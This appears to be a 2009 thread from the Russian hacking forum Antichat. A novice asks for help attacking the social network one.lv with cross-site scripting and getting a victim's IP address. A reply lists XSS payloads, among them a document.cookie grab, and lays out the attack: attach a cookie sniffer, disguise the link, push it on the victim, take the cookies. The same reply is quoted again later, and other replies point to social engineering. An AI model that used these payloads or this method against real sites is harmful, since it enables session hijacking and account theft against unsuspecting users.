Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Безопасность (https://forum.antichat.xyz/forumdisplay.php?f=41)
-   -   XSS помогите (https://forum.antichat.xyz/showthread.php?t=162640)

sakrej1 11.12.2009 11:27
XSS помогите
 
Люди помогите! Прочитал вот это и толком ничего не понял можно как то совсем подробно разжевать? Куда заходить, что нажимать и куда что пихать.... Я совсем ламер если что.
Меня интересует что бы это работало на www.one.lv Или помогите на практике. Могу дать аккаунт для опытов, если кто решит помоч.
P.S. В гугл просьба непосылать, там кроме этой статьи ничего нет.
P.S.S. Еще вопрос. Можно ли этим методом узнать ip жертвы и как можно больше инфы?

Gedj 11.12.2009 12:10
если ты там ничего непонял никто тебе необъяснит там и так все подробно расписано

root_sashok 11.12.2009 12:19
Логинься и подставляй во все поля всевозможные комбинации:

Код:
<img src="javascript:alert('XSS')"</img>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

"><script>alert(document.cookie)</script>
Найдешь, прицепишь сниффер, зашифруешь ссылку здесь, впаришь жертве, проверишь лог сниффера - куки твои.

Nizhegorodets 11.12.2009 17:44
Насчет IP жертвы и инфы, СИ тебе в помощь

Цитата:
http://www.social.do.am/
http://bugtraq.ru/library/misc/social.html

DiHWO 11.12.2009 19:52
Цитата:
Люди помогите! Прочитал вот это и толком ничего не понял можно как то совсем подробно разжевать? Куда заходить, что нажимать и куда что пихать.... Я совсем ламер если что.
Если чесно, я когда изучал xss тоже ничего по этой статье непонял, до меня долго доходило, надо сам смысл почувствовать. А вот про то что в гугле только одна страница - убило.
Цитата:
P.S.S. Еще вопрос. Можно ли этим методом узнать ip жертвы и как можно больше инфы?
Цитата:
Насчет IP жертвы и инфы, СИ тебе в помощь
В логах сниффера будет айпи, в поле реферер или аналогичном ему.

sakrej1 12.12.2009 12:08
Цитата:
Сообщение от root_sashok
Логинься и подставляй во все поля всевозможные комбинации:

Код:
<img src="javascript:alert('XSS')"</img>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

"><script>alert(document.cookie)</script>
Найдешь, прицепишь сниффер, зашифруешь ссылку здесь, впаришь жертве, проверишь лог сниффера - куки твои.
Ну вроде разобрался....Появилась другая проблема... Опыты ставил на форуме.Когда я из этого списка вставляю по одной строке, то мне ее и пишет. А когда я пытался засунуть весь список, то он почти на всех строках выдавал значок (картинка) и писал что "много кодировки,нельзя загрузить" Вот с этим как быть?
P.S. Форма отправки сообщений юзеру и сообщений на форум одинакова.


Время: 21:59